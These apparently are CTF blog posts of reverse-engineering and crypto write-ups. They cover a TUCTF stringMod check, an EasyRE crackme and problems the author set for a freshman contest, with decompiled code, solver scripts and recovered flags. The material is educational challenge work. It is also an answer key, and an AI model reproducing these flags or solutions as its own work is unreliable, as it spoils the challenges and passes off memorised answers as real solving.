class="line">}</span><br></pre></td></tr></table></figure></div><p>Both the encryption and the check live entirely inside the stringMod function:</p><div class="highlight-wrap" data-rel="C"><figure class="iseeu highlight /c"><table><tr><td class="code"><pre><span class="line"><span class="function">__int64 __fastcall <span class="title">stringMod</span><span class="params">(__int64 *a1)</span></span></span><br><span class="line"><span class="function"></span>{</span><br><span class="line"> __int64 length; <span class="comment">// r9</span></span><br><span class="line"> <span class="keyword">char</span> *c_str; <span class="comment">// r10</span></span><br><span class="line"> __int64 i; <span 
class="comment">// rcx</span></span><br><span class="line"> <span class="keyword">signed</span> <span class="keyword">int</span> v4; <span class="comment">// er8</span></span><br><span class="line"> <span class="keyword">int</span> *temp_2; <span class="comment">// rdi</span></span><br><span class="line"> <span class="keyword">int</span> *temp_3; <span class="comment">// rsi</span></span><br><span class="line"> <span class="keyword">signed</span> <span class="keyword">int</span> t; <span class="comment">// ecx</span></span><br><span class="line"> <span class="keyword">signed</span> <span class="keyword">int</span> j; <span class="comment">// er9</span></span><br><span class="line"> <span class="keyword">int</span> index; <span class="comment">// er10</span></span><br><span class="line"> <span class="keyword">unsigned</span> <span class="keyword">int</span> tmp; <span class="comment">// eax</span></span><br><span class="line"> <span class="keyword">int</span> sign; <span class="comment">// esi</span></span><br><span class="line"> <span class="keyword">int</span> v12; <span class="comment">// esi</span></span><br><span class="line"> <span class="keyword">int</span> temp[<span class="number">24</span>]; <span class="comment">// [rsp+0h] [rbp-60h]</span></span><br><span class="line"></span><br><span class="line"> <span class="built_in">memset</span>(temp, <span class="number">0</span>, <span class="number">0x48</span>uLL);</span><br><span class="line"> length = a1[<span class="number">1</span>];</span><br><span class="line"> <span class="keyword">if</span> ( length )</span><br><span class="line"> {</span><br><span class="line"> c_str = (<span class="keyword">char</span> *)*a1;</span><br><span class="line"> i = <span class="number">0L</span>L;</span><br><span class="line"> v4 = <span class="number">0</span>;</span><br><span class="line"> <span class="keyword">do</span></span><br><span class="line"> {</span><br><span class="line"> v12 = c_str[i];</span><br><span 
class="line"> temp[i] = v12;</span><br><span class="line"> <span class="keyword">if</span> ( <span class="number">3</span> * ((<span class="keyword">unsigned</span> <span class="keyword">int</span>)i / <span class="number">3</span>) == (_DWORD)i && v12 != firstchar[(<span class="keyword">unsigned</span> <span class="keyword">int</span>)i / <span class="number">3</span>] )<span class="comment">// when i is a multiple of 3, str[i] must equal firstchar[i/3]</span></span><br><span class="line"> <span class="comment">// { 65, 105, 110, 69, 111, 97}</span></span><br><span class="line"> v4 = <span class="number">-1</span>;</span><br><span class="line"> ++i;</span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">while</span> ( i != length );</span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">else</span></span><br><span class="line"> {</span><br><span class="line"> v4 = <span class="number">0</span>;</span><br><span class="line"> }</span><br><span class="line"> temp_2 = temp;</span><br><span class="line"> temp_3 = temp;</span><br><span class="line"> t = <span class="number">666</span>;</span><br><span class="line"> <span class="keyword">do</span></span><br><span class="line"> {</span><br><span class="line"> *temp_3 = t ^ *(<span class="keyword">unsigned</span> __int8 *)temp_3;</span><br><span class="line"> t += t % <span class="number">5</span>;</span><br><span class="line"> ++temp_3;</span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">while</span> ( &temp[<span class="number">18</span>] != temp_3 ); <span class="comment">// XOR step with the running key t</span></span><br><span class="line"> j = <span class="number">1</span>;</span><br><span class="line"> index = <span class="number">0</span>;</span><br><span class="line"> tmp = <span class="number">1</span>;</span><br><span class="line"> sign = <span class="number">0</span>;</span><br><span class="line"> <span class="keyword">do</span> <span class="comment">// verify each group of three (positions 0,1,2 of the triple)</span></span><br><span class="line"> {</span><br><span class="line"> <span class="keyword">if</span> ( sign == <span class="number">2</span> )</span><br><span class="line"> {</span><br><span class="line"> <span class="keyword">if</span> ( *temp_2 != thirdchar[index] ) <span class="comment">// { 751, 708, 732, 711, 734, 764, 0, 0 }</span></span><br><span class="line"> <span class="comment">// temp[2]=</span></span><br><span class="line"> v4 = <span class="number">-1</span>;</span><br><span class="line"> <span class="keyword">if</span> ( tmp % *temp_2 != masterArray[index] )<span class="comment">// { 471, 12, 580, 606, 147, 108 }</span></span><br><span class="line"> <span class="comment">//</span></span><br><span class="line"> <span class="comment">// temp[0]*temp[1]%temp[2]=</span></span><br><span class="line"> v4 = <span class="number">-1</span>;</span><br><span class="line"> ++index;</span><br><span class="line"> tmp = <span class="number">1</span>;</span><br><span class="line"> sign = <span class="number">0</span>;</span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">else</span> <span class="comment">// sign is 0 or 1</span></span><br><span class="line"> {</span><br><span class="line"> tmp *= *temp_2; <span class="comment">// sign 0: tmp=temp[0]</span></span><br><span class="line"> <span class="comment">// sign 1: tmp=temp[0]*temp[1]</span></span><br><span class="line"> <span class="keyword">if</span> ( ++sign == <span class="number">3</span> )</span><br><span class="line"> sign = <span class="number">0</span>;</span><br><span class="line"> }</span><br><span class="line"> ++j;</span><br><span class="line"> ++temp_2;</span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">while</span> ( j != <span class="number">19</span> ); <span class="comment">// 18 iterations</span></span><br><span class="line"> <span class="keyword">return</span> (<span class="keyword">unsigned</span> <span class="keyword">int</span>)(t * 
v4);</span><br><span class="line">}</span><br></pre></td></tr></table></figure></div><p>The verification in stringMod consists of three parts. In the first part, note that <code>v3</code> (the loop index, shown as <code>i</code> in the listing above) is an int, so integer division discards the fractional part; <code>3 * ((unsigned int)v3 / 3) == (_DWORD)v3</code> therefore holds only when <code>v3</code> is a multiple of <code>3</code>, which means the characters of the flag at positions <code>3*n</code> correspond to the six characters of firstchar.</p><p>Solve script:</p><div class="highlight-wrap" data-rel="PYTHON"><figure class="iseeu highlight /python"><table><tr><td class="code"><pre><span class="line">i = <span class="number">666</span></span><br><span class="line">num = [] <span class="comment"># v7, the running key t</span></span><br><span class="line">flag = <span class="string">'A**i**n**E**o**a**'</span> <span class="comment"># positions 0+3*n of the flag come from firstchar</span></span><br><span class="line">Xorflag = [] <span class="comment"># each flag position XORed with v7</span></span><br><span class="line">thirdchar = [<span class="number">0x2ef</span>, <span class="number">0x2c4</span>, <span class="number">0x2dc</span>, <span class="number">0x2c7</span>, <span class="number">0x2de</span>, <span class="number">0x2fc</span>]</span><br><span class="line">masterarray = [<span class="number">0x1d7</span>, <span class="number">0xc</span>, <span class="number">0x244</span>, <span class="number">0x25e</span>, <span class="number">0x93</span>, <span class="number">0x6c</span>]</span><br><span class="line"><span class="keyword">for</span> j <span class="keyword">in</span> range(<span class="number">18</span>): <span class="comment"># compute v7</span></span><br><span class="line">    num.append(i)</span><br><span class="line">    i += (i % <span class="number">5</span>)</span><br><span class="line">temp_num = <span class="number">0</span></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> range(<span class="number">2</span>, len(flag)+<span class="number">1</span>, <span class="number">3</span>): <span class="comment"># positions 2+3*n of the flag: undo the XOR on thirdchar</span></span><br><span class="line">    temp = thirdchar[temp_num] ^ num[i]</span><br><span class="line">    temp_num += <span class="number">1</span></span><br><span class="line">    flag = flag[:i] + chr(temp) + flag[i+<span class="number">1</span>:]</span><br><span class="line">temp_num = <span class="number">0</span></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> range(len(flag)): <span class="comment"># XOR each flag position with v7</span></span><br><span class="line">    temp = ord(flag[i]) ^ num[i]</span><br><span class="line">    Xorflag.append(temp)</span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> range(<span class="number">1</span>, <span class="number">19</span>, <span class="number">3</span>): <span class="comment"># positions 1+3*n of the flag: brute-force the product-mod check</span></span><br><span class="line">    <span class="keyword">for</span> j <span class="keyword">in</span> range(<span class="number">32</span>, <span class="number">128</span>):</span><br><span class="line">        j ^= num[i]</span><br><span class="line">        temp = j * Xorflag[i<span class="number">-1</span>] % Xorflag[i+<span class="number">1</span>]</span><br><span class="line">        <span class="keyword">if</span> temp == masterarray[temp_num]:</span><br><span class="line">            flag = flag[:i] + chr(j ^ num[i]) + flag[i+<span class="number">1</span>:]</span><br><span class="line">            temp_num += <span class="number">1</span></span><br><span class="line">            <span class="keyword">break</span></span><br><span class="line"><span class="built_in">print</span>(<span class="string">"tuctf{"</span> + flag + <span class="string">'}'</span>)</span><br></pre></td></tr></table></figure></div><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2020/12/22/6VdtmXQo5x9hBwT.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><h3 id="EasyRE"><a href="#EasyRE" class="headerlink" title="EasyRE"></a>EasyRE</h3><p>I don't know when I'll ever make a breakthrough on reversing challenges, where the road ahead leads, what I'll be able to do with this skill, or when I'll get stronger; after a year of learning reversing I'm still here doing EasyRE. Laughable, truly laughable!</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2020/12/22/dYo5zKEVjL3lJXp.png" alt="" title=""> </div> <div class="image-caption"></div> 
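<p>To double-check the three-part derivation above, here is an added Python example (mine, not part of the original write-up): a re-implementation of stringMod's check written from the decompiled listing, plus a solver that applies the same three constraints triple by triple. The constants are the ones shown in the listing; the function names and the assumption that only 18-character inputs can pass are mine.</p>

```python
# Added example, not code from the original write-up.
# Constants below are those visible in the decompiled stringMod listing.
FIRSTCHAR = [65, 105, 110, 69, 111, 97]                 # plaintext required at positions 3n
THIRDCHAR = [0x2EF, 0x2C4, 0x2DC, 0x2C7, 0x2DE, 0x2FC]  # XORed value required at positions 3n+2
MASTERARRAY = [0x1D7, 0xC, 0x244, 0x25E, 0x93, 0x6C]    # (x0 * x1) % x2 required per triple
LENGTH = 18  # assumption: the binary XORs exactly 18 cells, so other lengths are treated as failing


def keystream(n=LENGTH, t=666):
    """Reproduce the running key: t is used, then t += t % 5, for each of n cells."""
    ks = []
    for _ in range(n):
        ks.append(t)
        t += t % 5
    return ks


def string_mod(s):
    """Mirror of the decompiled stringMod: True iff the input passes all three checks."""
    if len(s) != LENGTH:
        return False
    temp = [ord(c) for c in s]
    # part 1: every third character must match firstchar
    for i in range(0, LENGTH, 3):
        if temp[i] != FIRSTCHAR[i // 3]:
            return False
    # part 2: XOR each cell with the running key
    temp = [c ^ k for c, k in zip(temp, keystream())]
    # part 3: per triple, the third cell and the product-mod condition
    for k in range(LENGTH // 3):
        x0, x1, x2 = temp[3 * k:3 * k + 3]
        if x2 != THIRDCHAR[k]:
            return False
        if (x0 * x1) % x2 != MASTERARRAY[k]:
            return False
    return True


def solve():
    """Derive the accepted input from the three constraints, one triple at a time."""
    ks = keystream()
    out = [None] * LENGTH
    for k in range(LENGTH // 3):
        p0, p1, p2 = 3 * k, 3 * k + 1, 3 * k + 2
        out[p0] = FIRSTCHAR[k]            # fixed directly by part 1
        out[p2] = THIRDCHAR[k] ^ ks[p2]   # undo the XOR of part 2
        x0, x2 = out[p0] ^ ks[p0], THIRDCHAR[k]
        # the middle character is only constrained modulo x2: brute-force printable ASCII
        for c in range(32, 128):
            if (x0 * (c ^ ks[p1])) % x2 == MASTERARRAY[k]:
                out[p1] = c
                break
        else:
            raise ValueError(f"no printable solution for triple {k}")
    return "".join(map(chr, out))


if __name__ == "__main__":
    flag = solve()
    assert string_mod(flag)
    print("tuctf{" + flag + "}")
```

<p><code>keystream()</code> produces the same 18 values as the <code>num</code> list in the script above, and <code>string_mod()</code> is the forward check, so <code>string_mod(solve())</code> being true confirms that the constraints were read off the listing correctly. Since each triple is solved independently, a wrong constant shows up as a <code>ValueError</code> naming the triple rather than as a silently wrong flag.</p>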
 </figure><p>A 32-bit file with no packer, so open it directly in IDA.</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2020/12/22/TxaPeuctCnb7qyz.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p>Shift+F12 opens the Strings window, where a flag shows up, but it is not the right one.<br>Note the right\n just below it; it belongs to the start function, so look at its pseudocode.</p><div class="highlight-wrap" data-rel="C"><figure class="iseeu highlight /c"><table><tr><td class="code"><pre><span class="line"><span class="keyword">signed</span> <span class="keyword">int</span> __usercall start@<eax>(<span class="keyword">int</span> a1@<ebp>, <span class="keyword">int</span> a2@<esi>)</span><br><span class="line">{</span><br><span class="line"> <span class="keyword">char</span> v2; <span class="comment">// bl</span></span><br><span class="line"> <span class="keyword">signed</span> <span class="keyword">int</span> result; <span class="comment">// eax</span></span><br><span class="line"> <span class="keyword">int</span> v4; <span class="comment">// ST14_4</span></span><br><span class="line"> _DWORD *v5; <span class="comment">// eax</span></span><br><span class="line"> _DWORD *v6; <span class="comment">// esi</span></span><br><span class="line"> _DWORD *v7; <span class="comment">// eax</span></span><br><span class="line"> _DWORD *v8; <span class="comment">// esi</span></span><br><span class="line"> <span class="keyword">int</span> v9; <span class="comment">// edi</span></span><br><span class="line"> <span class="keyword">int</span> v10; <span class="comment">// esi</span></span><br><span class="line"> _DWORD *v11; <span class="comment">// eax</span></span><br><span class="line"> <span class="keyword">int</span> v12; <span class="comment">// et1</span></span><br><span class="line"></span><br><span class="line"> sub_4017C7();</span><br><span class="line"> <span class="keyword">if</span> ( !(<span class="keyword">unsigned</span> 
__int8)sub_40157C(<span class="number">1</span>)</span><br><span class="line"> || (v2 = <span class="number">0</span>, *(_BYTE *)(a1 - <span class="number">25</span>) = <span class="number">0</span>, *(_DWORD *)(a1 - <span class="number">4</span>) = <span class="number">0</span>, *(_BYTE *)(a1 - <span class="number">36</span>) = sub_40154A(), dword_403334 == <span class="number">1</span>) )</span><br><span class="line"> {</span><br><span class="line"> sub_401885(<span class="number">7</span>);</span><br><span class="line"> <span class="keyword">goto</span> LABEL_20;</span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">if</span> ( dword_403334 )</span><br><span class="line"> {</span><br><span class="line"> v2 = <span class="number">1</span>;</span><br><span class="line"> *(_BYTE *)(a1 - <span class="number">25</span>) = <span class="number">1</span>;</span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">else</span></span><br><span class="line"> {</span><br><span class="line"> dword_403334 = <span class="number">1</span>;</span><br><span class="line"> <span class="keyword">if</span> ( initterm_e(&unk_4020D4, &unk_4020E0) )</span><br><span class="line"> {</span><br><span class="line"> *(_DWORD *)(a1 - <span class="number">4</span>) = <span class="number">-2</span>;</span><br><span class="line"> result = <span class="number">255</span>;</span><br><span class="line"> <span class="keyword">goto</span> LABEL_18;</span><br><span class="line"> }</span><br><span class="line"> initterm(&unk_4020C8, &unk_4020D0);</span><br><span class="line"> dword_403334 = <span class="number">2</span>;</span><br><span class="line"> }</span><br><span class="line"> sub_4016E5(*(_DWORD *)(a1 - <span class="number">36</span>));</span><br><span class="line"> v5 = (_DWORD *)sub_401879(v4);</span><br><span class="line"> v6 = v5;</span><br><span class="line"> <span class="keyword">if</span> ( *v5 && (<span class="keyword">unsigned</span> 
__int8)sub_401651(v5) )</span><br><span class="line"> ((<span class="keyword">void</span> (__thiscall *)(_DWORD, _DWORD, <span class="keyword">signed</span> <span class="keyword">int</span>, _DWORD))*v6)(*v6, <span class="number">0</span>, <span class="number">2</span>, <span class="number">0</span>);</span><br><span class="line"> v7 = (_DWORD *)sub_40187F();</span><br><span class="line"> v8 = v7;</span><br><span class="line"> <span class="keyword">if</span> ( *v7 && (<span class="keyword">unsigned</span> __int8)sub_401651(v7) )</span><br><span class="line"> register_thread_local_exe_atexit_callback(*v8);</span><br><span class="line"> v9 = get_initial_narrow_environment();</span><br><span class="line"> v10 = *(_DWORD *)_p___argv();</span><br><span class="line"> v11 = (_DWORD *)_p___argc();</span><br><span class="line"> a2 = sub_401080(*v11, v10, v9);</span><br><span class="line"> <span class="keyword">if</span> ( !(<span class="keyword">unsigned</span> __int8)sub_4019A4() )</span><br><span class="line">LABEL_20:</span><br><span class="line"> <span class="built_in">exit</span>(a2);</span><br><span class="line"> <span class="keyword">if</span> ( !v2 )</span><br><span class="line"> cexit();</span><br><span class="line"> sub_401702(<span class="number">1</span>, <span class="number">0</span>);</span><br><span class="line"> *(_DWORD *)(a1 - <span class="number">4</span>) = <span class="number">-2</span>;</span><br><span class="line"> result = a2;</span><br><span class="line">LABEL_18:</span><br><span class="line"> v12 = *(_DWORD *)(a1 - <span class="number">16</span>);</span><br><span class="line"> <span class="keyword">return</span> result;</span><br><span class="line">}</span><br></pre></td></tr></table></figure></div><p>Let's load it into IDA first. Find the prompt string <code>input</code> seen earlier on the command line; the function that cross-references it is sub_401080. (While browsing the Strings window my eyes lit up at <code>flag{NP2NiaNXx1ClGYVQ50}</code>, but entering it showed it is not the real flag...)</p><p>Press F5 to view the pseudocode of sub_401080. The string <code>input</code> is at address 0x402150, and from the surrounding code sub_401020 can be identified as printf. Further down, the string starting at address 0x402158 is %s, so sub_401050 should be scanf, which stores the user input in v7.</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2020/12/22/HJRNUExsLfdrIa4.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p>After reading the input, the length of v7 is checked; the code shows it must be exactly 24 characters.</p><p>Next, the character at address v8+7 is assigned to v2. According to IDA's stack analysis, v7 starts at ebp-24h (ebp-36) and v8 at ebp-14h (ebp-20). Assuming the input is <code>abcdefghijklmnopqrstuvwx</code>, the stack looks like the table below, so the initial value of v2 is the last input character, <code>x</code>.</p><table><thead><tr><th></th><th>Address</th><th>Byte</th></tr></thead><tbody><tr><td>high address</td><td>ebp-13</td><td>x</td></tr><tr><td>|</td><td>ebp-14</td><td>w</td></tr><tr><td>|</td><td>…</td><td>…</td></tr><tr><td>|</td><td>ebp-20</td><td>q</td></tr><tr><td>|</td><td>…</td><td>…</td></tr><tr><td>↓</td><td>ebp-35</td><td>b</td></tr><tr><td>low address</td><td>ebp-36</td><td>a</td></tr></tbody></table><p>In each iteration v1 drives the traversal of the input string: the value of v2 is assigned to v3, then the address in v2 is decremented by 1, i.e. the next character is taken in reverse order. The current character held in v3 is stored into byte_40336C[v1]. So this part simply extracts the user input in reverse and stores it in the array byte_40336C.</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2020/12/22/NWSZ7a84IdFbXRV.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p>Next, each value x in byte_40336C is transformed as (x+1)^6.</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2020/12/22/qzIwdZk8x4KueV9.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p>Finally the array byte_40336C, which is really a string, is compared with the string starting at address 0x402124. If they are equal, i.e. strcmp returns 0, printf is called to print <code>right\n</code>.</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2020/12/22/yoPcI9VbzH2JxSF.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p>Double-click unk_402124, select the 24 characters, press <code>Shift + E</code> to extract and choose <code>string literal</code>; the resulting string is <code>xIrCj~<r|2tWsv3PtI\x7Fzndka</code>.</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2020/12/22/FNnVfoygbApRHrv.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p>At this point the logic of the whole program is clear:</p><ul><li>In part 1, the user input is read.</li><li>In part 2, the length of the input is checked, and the input is extracted in reverse into an array (really a string).</li><li>In part 3, each value x in the array is transformed as (x+1)^6.</li><li>In part 4, the resulting array (string) is compared with <code>xIrCj~<r|2tWsv3PtI\x7Fzndka</code>; if they are equal, the challenge is solved.<br><img src="https://i.loli.net/2020/12/22/je4LdMXsZ6zIQpD.png" alt=""></li></ul><p>A Python script that inverts the transformation and recovers the correct input <code>flag{xNqU4otPq3ys9wkDsN}</code>:</p><div class="highlight-wrap" data-rel="PYTHON"><figure class="iseeu highlight /python"><table><tr><td class="code"><pre><span class="line"><span class="comment"># user_input is reversed and stored in arr</span></span><br><span class="line"><span class="comment"># each character in arr is transformed as (i+1)^6</span></span><br><span class="line"><span class="comment"># arr is compared with target; "right" is printed when they match</span></span><br><span class="line">target=<span class="string">'xIrCj~<r|2tWsv3PtI\x7Fzndka'</span></span><br><span class="line">res = <span class="string">""</span></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> target:</span><br><span class="line">    tmp = (ord(i) ^ <span class="number">6</span>) - <span class="number">1</span> <span class="comment"># watch the precedence of XOR!!</span></span><br><span class="line">    tmp_char = chr(tmp)</span><br><span class="line">    <span class="comment"># print("tmp:{}, tmp_char:{}".format(tmp, tmp_char))</span></span><br><span class="line">    res += tmp_char</span><br><span class="line"></span><br><span class="line">res = res[::<span class="number">-1</span>] <span class="comment"># reverse</span></span><br><span class="line">print(res) <span class="comment"># flag{xNqU4otPq3ys9wkDsN}</span></span><br></pre></td></tr></table></figure></div><p>Two things to watch out for when writing the script:</p><p>1. The inverse of XOR is XOR itself, for example:</p><div class="highlight-wrap" data-rel="PYTHON"><figure class="iseeu highlight /python"><table><tr><td class="code"><pre><span class="line">x = <span class="number">5</span></span><br><span class="line">y = x^<span class="number">6</span> <span class="comment"># 3, 0b101 ^ 0b110 => 0b011</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># given y, recover x</span></span><br><span class="line">x = y^<span class="number">6</span> <span class="comment"># 0b011 ^ 0b110 => 0b101</span></span><br></pre></td></tr></table></figure></div><p>2. In Python, XOR has lower precedence than the minus operator, so the subtraction binds first unless parenthesised:</p><div class="highlight-wrap" data-rel="PYTHON"><figure class="iseeu highlight /python"><table><tr><td class="code"><pre><span class="line"><span class="number">5</span>^<span class="number">6</span> <span class="number">-1</span> <span class="comment"># => 0, parsed as 5 ^ (6 - 1)</span></span><br><span class="line">(<span class="number">5</span>^<span class="number">6</span>) <span class="number">-1</span> <span class="comment"># => 2</span></span><br></pre></td></tr></table></figure></div>]]></content>
<summary type="html">
<p>Whiling away another lab class!</p>
</summary>
<category term="CTF" scheme="https://github.com/gha01un/gha01un.github.io/categories/CTF/"/>
<category term="RE" scheme="https://github.com/gha01un/gha01un.github.io/tags/RE/"/>
</entry>
<entry>
<title>A Noob Sets Problems for the Freshman Contest</title>
<link href="https://github.com/gha01un/gha01un.github.io/2020/11/30/%E8%8F%9C%E9%B8%A1%E7%9A%84%E6%96%B0%E7%94%9F%E8%B5%9B%E5%87%BA%E9%A2%98/"/>
<id>https://github.com/gha01un/gha01un.github.io/2020/11/30/%E8%8F%9C%E9%B8%A1%E7%9A%84%E6%96%B0%E7%94%9F%E8%B5%9B%E5%87%BA%E9%A2%98/</id>
<published>2020-11-30T09:45:53.263Z</published>
<updated>2021-01-03T09:59:36.746Z</updated>
<content type="html"><![CDATA[<p>I really am a noob!!!</p><a id="more"></a><h3 id="0x01-前言"><a href="#0x01-前言" class="headerlink" title="0x01 Preface"></a>0x01 Preface</h3><p>Setting these problems kept me busy for about half a month. Going from only being able to solve challenges to writing the source of simple ones, and then of some harder ones, I did learn a few things.</p><h3 id="0x02-RE"><a href="#0x02-RE" class="headerlink" title="0x02 RE"></a>0x02 RE</h3><h4 id="签到"><a href="#签到" class="headerlink" title="Sign-in"></a>Sign-in</h4><h5 id="题目描述"><a href="#题目描述" class="headerlink" title="Problem description"></a>Problem description</h5><p>hnqj did not feel like studying again today, so he decided to set a sign-in problem for everyone to play with. Those who know, know; those who do not will still get something out of it. Very quickly, hnqj had it ready. Come and sneak-attack it, solvers!</p><h5 id="源码"><a href="#源码" class="headerlink" title="Source"></a>Source</h5><div class="highlight-wrap" autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true" data-rel="C"><figure class="iseeu highlight /c"><table><tr><td class="code"><pre>
#include <stdio.h>
#include <string.h>
/* the target string: subtracting 7 from each of its characters gives the flag */
const char a[] = "{opzfpzfzvzvfohyk";
int main()
{
    size_t i = 0;
    char s[50] = {0};
    strcpy(s, "abcdefghijklmnjlkj");
    for (i = 0; i < strlen(s); ++i)
        s[i] += 7;
    puts(s);
    return 0;
}
</pre></td></tr></table></figure></div><p>Subtract seven from each character. Nothing more to say; it is a sign-in problem after all.</p><h4 id="真签到"><a href="#真签到" class="headerlink" title="Real sign-in"></a>Real sign-in</h4><p>Just a program thrown together; in a debugger you only need to know how to set a breakpoint to get the answer.</p><p>Set a breakpoint at <code>return 0</code> and take the MD5 to get the flag.</p><h4 id="逆向也就这么难了"><a href="#逆向也就这么难了" class="headerlink" title="Reversing is only this hard"></a>Reversing is only this hard</h4><p>I added this one because, a day into the contest, hardly any team had solved the first two sign-in problems, which was not what I expected. I genuinely want to encourage the juniors to get into this, heh.</p><p>Shift+F12 (the strings window) shows the flag.</p><h4 id="maze"><a href="#maze" class="headerlink" title="maze"></a>maze</h4><p>Modelled on the last reversing problem in the Attack-Defense World beginner area; essentially the same kind of problem, so nothing more to say.</p><h4 id="try"><a href="#try" class="headerlink" title="try"></a>try</h4><p>This problem came from master Haili. It is only one line of code, but quite a brain-teaser.</p><div class="highlight-wrap" autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true" data-rel="PYTHON"><figure class="iseeu highlight /python"><table><tr><td class="code"><pre>
import zlib, base64, marshal
print(base64.b64decode(zlib.decompress(base64.b64decode(b'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'
))))

-------------------------------------------------------------------------------------------------
# write the resulting bytes into a hex editor, save with a .pyc suffix, then decompile to .py to get:

flag = '****_****_****_****'
b = 'PUALAKLVV]TQ[}QD'
c = ''
for i in range(len(flag)):
    c += chr(ord(flag[i]) ^ ord(b[i]))
else:
    print(c)
------------------------------------------------------------------------------------------------
flag = ''
b = 'PUALAKLVV]TQ[}QD'
c = 'cd2512d512d5123e'
for i in range(len(c)):
    flag += chr(ord(c[i]) ^ ord(b[i]))
else:
    print(flag)
# then put the '_' characters back at their positions to get
# 31sy_py(c_go0d_jOb!
</pre></td></tr></table></figure></div><h4 id="easy-cpp"><a href="#easy-cpp" class="headerlink" title="easy_cpp"></a>easy_cpp</h4><p>Master hl wrote the source, far better than I could, so I will not post it here; here is just the exp.</p><div class="highlight-wrap" autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true" data-rel="PYTHON"><figure class="iseeu highlight /python"><table><tr><td class="code"><pre>
import base64
flag = ''; base64flag = ''; table = {}
origin = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/'
for i in range(len(origin)):
    table[origin[i]] = origin[i]
for i in range(6, 15):
    table[origin[i]], table[origin[i+10]] = table[origin[i+10]], table[origin[i]]  # restore the base64 alphabet
print(table)
secret = 'ZmxhZ3tiGNXlXjHfaDTzN2FfK3LycRTpc2L9'
for i in range(len(secret)):
    base64flag += table[secret[i]]  # map characters through the restored alphabet: G~O become Q~Y and Q~Y become G~O
print(base64flag)

# base64 decode
flag = base64.b64decode(base64flag)
print(flag)


# restoring the base64 alphabet is equivalent to the following
secret1 = 'ZmxhZ3tiGNXlXjHfaDTzN2FfK3LycRTpc2L9'
a = ''
for i in range(len(secret1)):
    if ord(secret1[i]) < 80 and ord(secret1[i]) >= 71:
        a += chr(ord(secret1[i]) + 10)
    elif ord(secret1[i]) < 90 and ord(secret1[i]) >= 81:
        a += chr(ord(secret1[i]) - 10)
    else:
        a += chr(ord(secret1[i]))
print(a)
</pre></td></tr></table></figure></div><h4 id="大三才学的密码学"><a href="#大三才学的密码学" class="headerlink" title="Crypto you only learn in third year"></a>Crypto you only learn in third year</h4><p>The previous post has a detailed write-up of this one; refer to that.</p><h3 id="0x03-密码"><a href="#0x03-密码" class="headerlink" title="0x03 Crypto"></a>0x03 Crypto</h3><h4 id="最最最基础密码"><a href="#最最最基础密码" class="headerlink" title="The most basic cipher ever"></a>The most basic cipher ever</h4><p>An affine cipher; Ao-shen solved it straight away by hand!</p><h4 id="Rsa"><a href="#Rsa" class="headerlink" title="Rsa"></a>Rsa</h4><div class="highlight-wrap" autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true" data-rel="PYTHON"><figure class="iseeu highlight /python"><table><tr><td class="code"><pre>
from Crypto.Util.number import *
from gmpy2 import *
from sympy.ntheory.residue_ntheory import nthroot_mod
n = 7941371739956577280160664419383740967516918938781306610817149744988379280561359039016508679365806108722198157199058807892703837558280678711420411242914059658055366348123106473335186505617418956630780649894945233345985279471106888635177256011468979083320605103256178446993230320443790240285158260236926519042413378204298514714890725325831769281505530787739922007367026883959544239568886349070557272869042275528961483412544495589811933856131557221673534170105409
d = 7515987842794170949444517202158067021118454558360145030399453487603693522695746732547224100845570119375977629070702308991221388721952258969752305904378724402002545947182529859604584400048983091861594720299791743887521228492714135449584003054386457751933095902983841246048952155097668245322664318518861440
cipher = 1618155233923718966393124032999431934705026408748451436388483012584983753140040289666712916510617403356206112730613485227084128314043665913357106301736817062412927135716281544348612150328867226515184078966397180771624148797528036548243343316501503364783092550480439749404301122277056732857399413805293899249313045684662146333448668209567898831091274930053147799756622844119463942087160062353526056879436998061803187343431081504474584816590199768034450005448200
p = 102634610559478918970860957918259981057327949366949344137104804864768237961662136189827166317524151288799657758536256924609797810164397005081733039415393
q = 7534810196420932552168708937019691994681052660068275906973480617604535381306041583841106383688654426129050931519275383386503174076258645141589911492908993
r = 10269028767754306217563721664976261924407940883784193817786660413744866184645984238866463711873380072803747092361041245422348883639933712733051005791543841
phn = (p-1)*(q-1)*(r-1)  # phi(n) for the three-prime modulus n = p*q*r
e = 0x10001
dec = invert(e, phn)  # private exponent from e and phi(n)
print(dec)
c = pow(cipher, dec, n)
print(c)
m = nthroot_mod(c, 2, r)  # c is a square; recover m as a square root of c modulo r
print(m)
print(long_to_bytes(m))
